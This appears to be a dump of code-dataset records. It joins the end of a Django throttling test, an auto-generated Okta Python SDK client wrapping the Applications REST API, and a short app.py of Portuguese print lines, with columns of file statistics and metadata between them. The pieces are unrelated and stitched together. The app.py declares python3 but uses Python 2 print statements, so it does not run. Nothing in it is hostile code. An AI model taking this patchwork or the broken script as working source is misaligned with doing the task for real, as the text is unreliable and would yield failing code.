        self.assertEqual(ApiAccess.objects.count(), 7)
        self.assertEqual(ApiAccess.objects.filter(identifier='daniel').count(), 4)
        # After the timeframe lapses, the cache window empties but the DB
        # rows remain as a permanent audit trail.
        time.sleep(3)
        self.assertEqual(throttle.should_be_throttled('daniel'), False)
        self.assertEqual(len(cache.get('daniel_accesses')), 0)
        self.assertEqual(ApiAccess.objects.count(), 7)
        self.assertEqual(ApiAccess.objects.filter(identifier='daniel').count(), 4)
class ModelTestCase(TestCase):
    def test_unicode(self):
        """The text form of an ApiAccess pairs identifier with timestamp."""
        record = ApiAccess(identifier="testing", accessed=0)
        self.assertEqual(force_text(record), 'testing @ 0')
| 44.098592
| 96
| 0.701054
| 738
| 6,262
| 5.761518
| 0.109756
| 0.25047
| 0.216369
| 0.208843
| 0.805268
| 0.780809
| 0.771402
| 0.752117
| 0.639699
| 0.603716
| 0
| 0.022252
| 0.167518
| 6,262
| 141
| 97
| 44.411348
| 0.793401
| 0.017726
| 0
| 0.576923
| 0
| 0
| 0.098486
| 0
| 0
| 0
| 0
| 0
| 0.682692
| 1
| 0.086538
| false
| 0
| 0.057692
| 0
| 0.182692
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
6a497773f8b8fe4140b0f5abb4f0c87c2a1a538c
| 46,828
|
py
|
Python
|
okta/resource_clients/application_client.py
|
csanders-git/okta-sdk-python
|
bb843055056fe81e5bd0d97c14187af82ccfd06a
|
[
"Apache-2.0"
] | 1
|
2021-07-07T15:04:14.000Z
|
2021-07-07T15:04:14.000Z
|
okta/resource_clients/application_client.py
|
csanders-git/okta-sdk-python
|
bb843055056fe81e5bd0d97c14187af82ccfd06a
|
[
"Apache-2.0"
] | null | null | null |
okta/resource_clients/application_client.py
|
csanders-git/okta-sdk-python
|
bb843055056fe81e5bd0d97c14187af82ccfd06a
|
[
"Apache-2.0"
] | 1
|
2022-01-19T09:29:14.000Z
|
2022-01-19T09:29:14.000Z
|
"""
Copyright 2020 - Present Okta, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
# AUTO-GENERATED! DO NOT EDIT FILE DIRECTLY
# SEE CONTRIBUTOR DOCUMENTATION
from urllib.parse import urlencode
from okta.http_client import HTTPClient
from okta.models.application\
import Application
from okta.models.csr\
import Csr
from okta.models.json_web_key\
import JsonWebKey
from okta.models.o_auth_2_scope_consent_grant\
import OAuth2ScopeConsentGrant
from okta.models.application_group_assignment\
import ApplicationGroupAssignment
from okta.models.o_auth_2_token\
import OAuth2Token
from okta.models.app_user\
import AppUser
from okta.utils import format_url
from okta.api_client import APIClient
from okta.constants import find_app_model
class ApplicationClient(APIClient):
"""
A Client object for the Application resource.
"""
    def __init__(self):
        # Prefix prepended to every API path built by this client;
        # empty by default (the request executor supplies the org URL).
        self._base_url = ""
async def list_applications(
self, query_params={}
):
"""
Enumerates apps added to your organization with paginat
ion. A subset of apps can be returned that match a supp
orted filter expression or query.
Args:
query_params {dict}: Map of query parameters for request
[query_params.q] {str}
[query_params.after] {str}
[query_params.limit] {str}
[query_params.filter] {str}
[query_params.expand] {str}
[query_params.includeNonDeleted] {str}
Returns:
list: Collection of Application instances.
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, Application)
if error:
return (None, response, error)
try:
result = []
for item in response.get_body():
result.append(
find_app_model(item["signOnMode"], item["name"])(
self.form_response_body(item)
)
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def create_application(
self, application, query_params={}
):
"""
Adds a new application to your Okta organization.
Args:
{application}
query_params {dict}: Map of query parameters for request
[query_params.activate] {str}
Returns:
Application
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
if isinstance(application, dict):
body = application
else:
body = application.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, Application)
if error:
return (None, response, error)
try:
body = response.get_body()
result = find_app_model(body["signOnMode"], body["name"])(
self.form_response_body(body)
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def delete_application(
self, appId
):
"""
Removes an inactive application.
Args:
app_id {str}
"""
http_method = "delete".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def get_application(
self, appId, query_params={}
):
"""
Fetches an application from your Okta organization by `
id`.
Args:
app_id {str}
query_params {dict}: Map of query parameters for request
[query_params.expand] {str}
Returns:
Application
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, Application)
if error:
return (None, response, error)
try:
body = response.get_body()
result = find_app_model(body["signOnMode"], body["name"])(
self.form_response_body(body)
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def update_application(
self, appId, application
):
"""
Updates an application in your organization.
Args:
app_id {str}
{application}
Returns:
Application
"""
http_method = "put".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}
""")
if isinstance(application, dict):
body = application
else:
body = application.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, Application)
if error:
return (None, response, error)
try:
body = response.get_body()
result = find_app_model(body["signOnMode"], body["name"])(
self.form_response_body(body)
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def list_csrs_for_application(
self, appId
):
"""
Enumerates Certificate Signing Requests for an applicat
ion
Args:
app_id {str}
Returns:
list: Collection of Csr instances.
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, Csr)
if error:
return (None, response, error)
try:
result = []
for item in response.get_body():
result.append(Csr(
self.form_response_body(item)
))
except Exception as error:
return (None, response, error)
return (result, response, None)
async def generate_csr_for_application(
self, appId, csr_metadata
):
"""
Generates a new key pair and returns the Certificate Si
gning Request for it.
Args:
app_id {str}
{csr_metadata}
Returns:
Csr
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs
""")
if isinstance(csr_metadata, dict):
body = csr_metadata
else:
body = csr_metadata.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, Csr)
if error:
return (None, response, error)
try:
result = Csr(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def revoke_csr_from_application(
self, appId, csrId
):
"""
Method for
/api/v1/apps/{appId}/credentials/csrs/{csrId}
Args:
app_id {str}
csr_id {str}
"""
http_method = "delete".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs/{csrId}
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def get_csr_for_application(
self, appId, csrId
):
"""
Method for
/api/v1/apps/{appId}/credentials/csrs/{csrId}
Args:
app_id {str}
csr_id {str}
Returns:
Csr
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs/{csrId}
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, Csr)
if error:
return (None, response, error)
try:
result = Csr(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def publish_cer_cert(
self, appId, csrId, string
):
"""
Method for
/api/v1/apps/{appId}/credentials/csrs/{csrId}/lifecycle
/publish
Args:
app_id {str}
csr_id {str}
{string}
Returns:
JsonWebKey
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs/{csrId}
/lifecycle/publish
""")
if isinstance(string, dict):
body = string
else:
body = string.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/x-x509-ca-cert"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = JsonWebKey(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def publish_binary_cer_cert(
self, appId, csrId, string
):
"""
Method for
/api/v1/apps/{appId}/credentials/csrs/{csrId}/lifecycle
/publish
Args:
app_id {str}
csr_id {str}
{string}
Returns:
JsonWebKey
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs/{csrId}
/lifecycle/publish
""")
body = HTTPClient.format_binary_data(string)
headers = {
"Accept": "application/json",
"Content-Type": "application/x-x509-ca-cert"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = JsonWebKey(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def publish_der_cert(
self, appId, csrId, string
):
"""
Method for
/api/v1/apps/{appId}/credentials/csrs/{csrId}/lifecycle
/publish
Args:
app_id {str}
csr_id {str}
{string}
Returns:
JsonWebKey
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs/{csrId}
/lifecycle/publish
""")
if isinstance(string, dict):
body = string
else:
body = string.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/pkix-cert"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = JsonWebKey(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def publish_binary_der_cert(
self, appId, csrId, string
):
"""
Method for
/api/v1/apps/{appId}/credentials/csrs/{csrId}/lifecycle
/publish
Args:
app_id {str}
csr_id {str}
{string}
Returns:
JsonWebKey
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs/{csrId}
/lifecycle/publish
""")
body = HTTPClient.format_binary_data(string)
headers = {
"Accept": "application/json",
"Content-Type": "application/pkix-cert"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = JsonWebKey(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def publish_binary_pem_cert(
self, appId, csrId, string
):
"""
Method for
/api/v1/apps/{appId}/credentials/csrs/{csrId}/lifecycle
/publish
Args:
app_id {str}
csr_id {str}
{string}
Returns:
JsonWebKey
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/csrs/{csrId}
/lifecycle/publish
""")
body = HTTPClient.format_binary_data(string)
headers = {
"Accept": "application/json",
"Content-Type": "application/x-pem-file"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = JsonWebKey(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def list_application_keys(
self, appId
):
"""
Enumerates key credentials for an application
Args:
app_id {str}
Returns:
list: Collection of JsonWebKey instances.
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/keys
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = []
for item in response.get_body():
result.append(JsonWebKey(
self.form_response_body(item)
))
except Exception as error:
return (None, response, error)
return (result, response, None)
async def generate_application_key(
self, appId, query_params={}
):
"""
Generates a new X.509 certificate for an application ke
y credential
Args:
app_id {str}
query_params {dict}: Map of query parameters for request
[query_params.validityYears] {str}
Returns:
JsonWebKey
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/keys/generate
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = JsonWebKey(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def get_application_key(
self, appId, keyId
):
"""
Gets a specific application key credential by kid
Args:
app_id {str}
key_id {str}
Returns:
JsonWebKey
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/keys/{keyId}
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = JsonWebKey(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def clone_application_key(
self, appId, keyId, query_params={}
):
"""
Clones a X.509 certificate for an application key crede
ntial from a source application to target application.
Args:
app_id {str}
key_id {str}
query_params {dict}: Map of query parameters for request
[query_params.targetAid] {str}
Returns:
JsonWebKey
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/credentials/keys/{keyId}/clone
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, JsonWebKey)
if error:
return (None, response, error)
try:
result = JsonWebKey(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def list_scope_consent_grants(
self, appId, query_params={}
):
"""
Lists all scope consent grants for the application
Args:
app_id {str}
query_params {dict}: Map of query parameters for request
[query_params.expand] {str}
Returns:
list: Collection of OAuth2ScopeConsentGrant instances.
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/grants
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OAuth2ScopeConsentGrant)
if error:
return (None, response, error)
try:
result = []
for item in response.get_body():
result.append(OAuth2ScopeConsentGrant(
self.form_response_body(item)
))
except Exception as error:
return (None, response, error)
return (result, response, None)
async def grant_consent_to_scope(
self, appId, o_auth_2_scope_consent_grant
):
"""
Grants consent for the application to request an OAuth
2.0 Okta scope
Args:
app_id {str}
{o_auth_2_scope_consent_grant}
Returns:
OAuth2ScopeConsentGrant
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/grants
""")
if isinstance(o_auth_2_scope_consent_grant, dict):
body = o_auth_2_scope_consent_grant
else:
body = o_auth_2_scope_consent_grant.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OAuth2ScopeConsentGrant)
if error:
return (None, response, error)
try:
result = OAuth2ScopeConsentGrant(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def revoke_scope_consent_grant(
self, appId, grantId
):
"""
Revokes permission for the application to request the g
iven scope
Args:
app_id {str}
grant_id {str}
"""
http_method = "delete".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/grants/{grantId}
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def get_scope_consent_grant(
self, appId, grantId, query_params={}
):
"""
Fetches a single scope consent grant for the applicatio
n
Args:
app_id {str}
grant_id {str}
query_params {dict}: Map of query parameters for request
[query_params.expand] {str}
Returns:
OAuth2ScopeConsentGrant
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/grants/{grantId}
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OAuth2ScopeConsentGrant)
if error:
return (None, response, error)
try:
result = OAuth2ScopeConsentGrant(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def list_application_group_assignments(
self, appId, query_params={}
):
"""
Enumerates group assignments for an application.
Args:
app_id {str}
query_params {dict}: Map of query parameters for request
[query_params.q] {str}
[query_params.after] {str}
[query_params.limit] {str}
[query_params.expand] {str}
Returns:
list: Collection of ApplicationGroupAssignment instances.
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/groups
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, ApplicationGroupAssignment)
if error:
return (None, response, error)
try:
result = []
for item in response.get_body():
result.append(ApplicationGroupAssignment(
self.form_response_body(item)
))
except Exception as error:
return (None, response, error)
return (result, response, None)
async def delete_application_group_assignment(
self, appId, groupId
):
"""
Removes a group assignment from an application.
Args:
app_id {str}
group_id {str}
"""
http_method = "delete".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/groups/{groupId}
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def get_application_group_assignment(
self, appId, groupId, query_params={}
):
"""
Fetches an application group assignment
Args:
app_id {str}
group_id {str}
query_params {dict}: Map of query parameters for request
[query_params.expand] {str}
Returns:
ApplicationGroupAssignment
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/groups/{groupId}
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, ApplicationGroupAssignment)
if error:
return (None, response, error)
try:
result = ApplicationGroupAssignment(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def create_application_group_assignment(
self, appId, groupId, application_group_assignment
):
"""
Assigns a group to an application
Args:
app_id {str}
group_id {str}
{application_group_assignment}
Returns:
ApplicationGroupAssignment
"""
http_method = "put".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/groups/{groupId}
""")
if isinstance(application_group_assignment, dict):
body = application_group_assignment
else:
body = application_group_assignment.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, ApplicationGroupAssignment)
if error:
return (None, response, error)
try:
result = ApplicationGroupAssignment(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def activate_application(
self, appId
):
"""
Activates an inactive application.
Args:
app_id {str}
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/lifecycle/activate
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def deactivate_application(
self, appId
):
"""
Deactivates an active application.
Args:
app_id {str}
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/lifecycle/deactivate
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def revoke_o_auth_2_tokens_for_application(
self, appId
):
"""
Revokes all tokens for the specified application
Args:
app_id {str}
"""
http_method = "delete".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/tokens
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def list_o_auth_2_tokens_for_application(
self, appId, query_params={}
):
"""
Lists all tokens for the application
Args:
app_id {str}
query_params {dict}: Map of query parameters for request
[query_params.expand] {str}
[query_params.after] {str}
[query_params.limit] {str}
Returns:
list: Collection of OAuth2Token instances.
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/tokens
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OAuth2Token)
if error:
return (None, response, error)
try:
result = []
for item in response.get_body():
result.append(OAuth2Token(
self.form_response_body(item)
))
except Exception as error:
return (None, response, error)
return (result, response, None)
async def revoke_o_auth_2_token_for_application(
self, appId, tokenId
):
"""
Revokes the specified token for the specified applicati
on
Args:
app_id {str}
token_id {str}
"""
http_method = "delete".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/tokens/{tokenId}
""")
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def get_o_auth_2_token_for_application(
self, appId, tokenId, query_params={}
):
"""
Gets a token for the specified application
Args:
app_id {str}
token_id {str}
query_params {dict}: Map of query parameters for request
[query_params.expand] {str}
Returns:
OAuth2Token
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/tokens/{tokenId}
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, OAuth2Token)
if error:
return (None, response, error)
try:
result = OAuth2Token(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def list_application_users(
self, appId, query_params={}
):
"""
Enumerates all assigned [application users](#applicatio
n-user-model) for an application.
Args:
app_id {str}
query_params {dict}: Map of query parameters for request
[query_params.q] {str}
[query_params.query_scope] {str}
[query_params.after] {str}
[query_params.limit] {str}
[query_params.filter] {str}
[query_params.expand] {str}
Returns:
list: Collection of AppUser instances.
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/users
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, AppUser)
if error:
return (None, response, error)
try:
result = []
for item in response.get_body():
result.append(AppUser(
self.form_response_body(item)
))
except Exception as error:
return (None, response, error)
return (result, response, None)
async def assign_user_to_application(
self, appId, app_user
):
"""
Assigns an user to an application with [credentials](#a
pplication-user-credentials-object) and an app-specific
[profile](#application-user-profile-object). Profile m
appings defined for the application are first applied b
efore applying any profile properties specified in the
request.
Args:
app_id {str}
{app_user}
Returns:
AppUser
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/users
""")
if isinstance(app_user, dict):
body = app_user
else:
body = app_user.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, AppUser)
if error:
return (None, response, error)
try:
result = AppUser(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def delete_application_user(
self, appId, userId, query_params={}
):
"""
Removes an assignment for a user from an application.
Args:
app_id {str}
user_id {str}
query_params {dict}: Map of query parameters for request
[query_params.sendEmail] {str}
"""
http_method = "delete".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/users/{userId}
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, error)
response, error = await self._request_executor\
.execute(request)
if error:
return (response, error)
return (response, None)
async def get_application_user(
self, appId, userId, query_params={}
):
"""
Fetches a specific user assignment for application by `
id`.
Args:
app_id {str}
user_id {str}
query_params {dict}: Map of query parameters for request
[query_params.expand] {str}
Returns:
AppUser
"""
http_method = "get".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/users/{userId}
""")
if query_params:
encoded_query_params = urlencode(query_params)
api_url += f"/?{encoded_query_params}"
body = {}
headers = {}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, AppUser)
if error:
return (None, response, error)
try:
result = AppUser(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
async def update_application_user(
self, appId, userId, app_user
):
"""
Updates a user's profile for an application
Args:
app_id {str}
user_id {str}
{app_user}
Returns:
AppUser
"""
http_method = "post".upper()
api_url = format_url(f"""
{self._base_url}
/api/v1/apps/{appId}/users/{userId}
""")
if isinstance(app_user, dict):
body = app_user
else:
body = app_user.as_dict()
headers = {
"Accept": "application/json",
"Content-Type": "application/json"
}
request, error = await self._request_executor.create_request(
http_method, api_url, body, headers
)
if error:
return (None, None, error)
response, error = await self._request_executor\
.execute(request, AppUser)
if error:
return (None, response, error)
try:
result = AppUser(
self.form_response_body(response.get_body())
)
except Exception as error:
return (None, response, error)
return (result, response, None)
| 27.758151
| 72
| 0.533313
| 4,639
| 46,828
| 5.182151
| 0.060358
| 0.063602
| 0.058028
| 0.064642
| 0.864517
| 0.84272
| 0.824958
| 0.814601
| 0.805657
| 0.793095
| 0
| 0.003209
| 0.374413
| 46,828
| 1,686
| 73
| 27.774614
| 0.817409
| 0.014414
| 0
| 0.836638
| 0
| 0
| 0.126642
| 0.044801
| 0
| 0
| 0
| 0
| 0
| 1
| 0.000944
| false
| 0.00661
| 0.011331
| 0
| 0.144476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6a4d95ce98e7d496a224480c1bb172cc8703960d
| 163
|
py
|
Python
|
app.py
|
paulo-pieretti/aulagit
|
15c75d991aadd99ffadf6311dafa40844751feca
|
[
"MIT"
] | null | null | null |
app.py
|
paulo-pieretti/aulagit
|
15c75d991aadd99ffadf6311dafa40844751feca
|
[
"MIT"
] | null | null | null |
app.py
|
paulo-pieretti/aulagit
|
15c75d991aadd99ffadf6311dafa40844751feca
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# Demo script used in a git tutorial. The shebang declares python3, but the
# original body used Python 2 `print` statements, which are a SyntaxError
# under python3 — converted to print() calls (output is unchanged).
print("codigo 2")
print("adicionando uma diferenca")
print("adicionando mais uma diferenca")
print("adicionando uma diferenca no site do github")
| 20.375
| 51
| 0.779141
| 23
| 163
| 5.521739
| 0.608696
| 0.377953
| 0.299213
| 0.440945
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.014286
| 0.141104
| 163
| 7
| 52
| 23.285714
| 0.892857
| 0.104294
